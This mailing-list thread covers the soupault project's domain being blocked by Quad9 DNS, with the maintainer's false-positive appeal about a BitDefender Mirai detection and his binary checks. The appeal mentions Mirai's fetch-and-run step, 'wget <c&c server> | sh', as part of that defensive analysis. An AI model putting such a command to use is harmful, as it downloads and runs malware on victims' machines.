Quad9 isn’t resolving the domain.
$ nslookup soupault.app 9.9.9.9
Are you using their DNS too? My current workaround is cloning the repo and reading its lightweight markup docs/manuals as needed.
dmbaturin, if this is the case, you'll wanna hit up Quad9’s contact form and ask to get unbanned.
--
toastal ไข่ดาว | https://toast.al
PGP: 7944 74b7 d236 dab9 c9ef e7f9 5cce 6f14 66d4 7c9e
I received the same results. But when
I went to my cellphone and switched it to
data the site showed up. A friend also
said it is working fine for her.
So i will figure out how to view it on my
laptops at some point. eventually talk to
our home internet provider.
---
Aoirthoir An Broc
The Trickster G-ds,
The G-ds oph Mischiephs.
On 2023-06-21 23:38, toastal wrote:
> Quad9 isn’t resolving the domain.> > $ nslookup soupault.app 9.9.9.9> > Are you using their DNS too? My current workaround is cloning the repo> and reading its lightweight markup docs/manuals as needed.> > dmbaturin, if this is the case, you'll wanna hit up Quad9’s contact> form and ask to get unbanned.
Hi Aoirthoir and toastal,
That Quod9 stuff is a complete surprise to me.
It looks like the ban is spreading — it worked with 8.8.8.8 yesterday
but today it doesn't.
I've registered soupault.net in case it's the .app domain that caused
the problem.
There's a backlash against those Google domains that resemble
commonly-used file extensions (.app, .mov, and now .zip)
because malicious actors often use them to create deceptive links.
However, I'm going to wait for a response from Quad9 before setting up
A/AAAA records
and pointing the website to the new domain, just in case the current ban
of soupault.app will spread to the new domain as well.
Meanwhile, you can access the website by its Netlify address where it's
hosted: https://soupault.netlify.app/
Thanks for reporting the issue!
On 6/22/23 05:13, aoirthoir@aoirthoir.com wrote:
> I received the same results. But when> I went to my cellphone and switched it to> data the site showed up. A friend also> said it is working fine for her.>> So i will figure out how to view it on my> laptops at some point. eventually talk to> our home internet provider.> ---> Aoirthoir An Broc> The Trickster G-ds,> The G-ds oph Mischiephs.>> On 2023-06-21 23:38, toastal wrote:>> Quad9 isn’t resolving the domain.>>>> $ nslookup soupault.app 9.9.9.9>>>> Are you using their DNS too? My current workaround is cloning the repo>> and reading its lightweight markup docs/manuals as needed.>>>> dmbaturin, if this is the case, you'll wanna hit up Quad9’s contact>> form and ask to get unbanned.
Ok, I think I know where the root cause lies. Here's a copy of the
investigation notes that I sent to Quod9 in my blocklist removal request.
Dear Quod9 team,
soupault.app., the domain of my project, recently got blocked. I
appreciate your effort to keep the users safe, but in this case it's a
false positive.
You can view the website on Netlify: https://soupault.netlify.app
It's an open-source project with a four year history of releases:
https://github.com/PataphysicalSociety/soupault — a static site
generator framework that is based on HTML element tree rewriting (as
opposed to Jekyll or Hugo that treat HTML as an opaque format).
I suppose one reason for the block may be that one antivirus software
vendor (BitDefender) flagged the Linux executable of the latest release
as malware.
This report shows that BitDefender thinks it's infected with Mirai:
https://www.virustotal.com/gui/file/e044a7a309e38516e536799d7e869a00ade637ca4079764bf8aeb1620c72f652/detection
However, no other vendor detects anything wrong there, and macOS and
Windows executables that are built from the same source code and the
same third-party libraries don't raise any alarms.
* Windows:
https://www.virustotal.com/gui/file/0883e2e7d844cfc71f82ea87466908f40f401927b3236a01248f9f65415d8eef/detection
* macOS:
https://www.virustotal.com/gui/file/b0777f5c940a28da2994f643d5eaad230cbbc4262a063183f2b1426983704abc/detection
I also checked the executable to rule out a possibly supply chain attack
through a third-party library. My checks with strings, objdump, and
strace show that it doesn't contain any data (like command and control
server addresses) and doesn't make any system calls I don't expect it to
make.
In fact, it doesn't make any network connections at all — as it should,
being a static site generator. Actual Mirai samples I could find use
"wget <c&c server> | sh" to get the payload, and they are detected by
multiple vendors.
(Of course, I didn't intentionally include any malicious code in the
project. Since it's open-source, everyone is free to confirm that.)
Finally, re-compiling the executable with GNU libc instead of musl makes
it pass the BitDefender check, and checking the musl library file from
the package I use (musl-libc-static-1.2.3-2.fc37.x86_64) also doesn't
raise any alarms.
If you need the file in question to forward to the threat intelligence
provider, you can get it from
https://github.com/PataphysicalSociety/soupault/releases/download/4.6.0/soupault-4.6.0-linux-x86_64.tar.gz
Thanks in advance,
Daniil
On 6/22/23 05:13, aoirthoir@aoirthoir.com wrote:
> I received the same results. But when> I went to my cellphone and switched it to> data the site showed up. A friend also> said it is working fine for her.>> So i will figure out how to view it on my> laptops at some point. eventually talk to> our home internet provider.> ---> Aoirthoir An Broc> The Trickster G-ds,> The G-ds oph Mischiephs.>> On 2023-06-21 23:38, toastal wrote:>> Quad9 isn’t resolving the domain.>>>> $ nslookup soupault.app 9.9.9.9>>>> Are you using their DNS too? My current workaround is cloning the repo>> and reading its lightweight markup docs/manuals as needed.>>>> dmbaturin, if this is the case, you'll wanna hit up Quad9’s contact>> form and ask to get unbanned.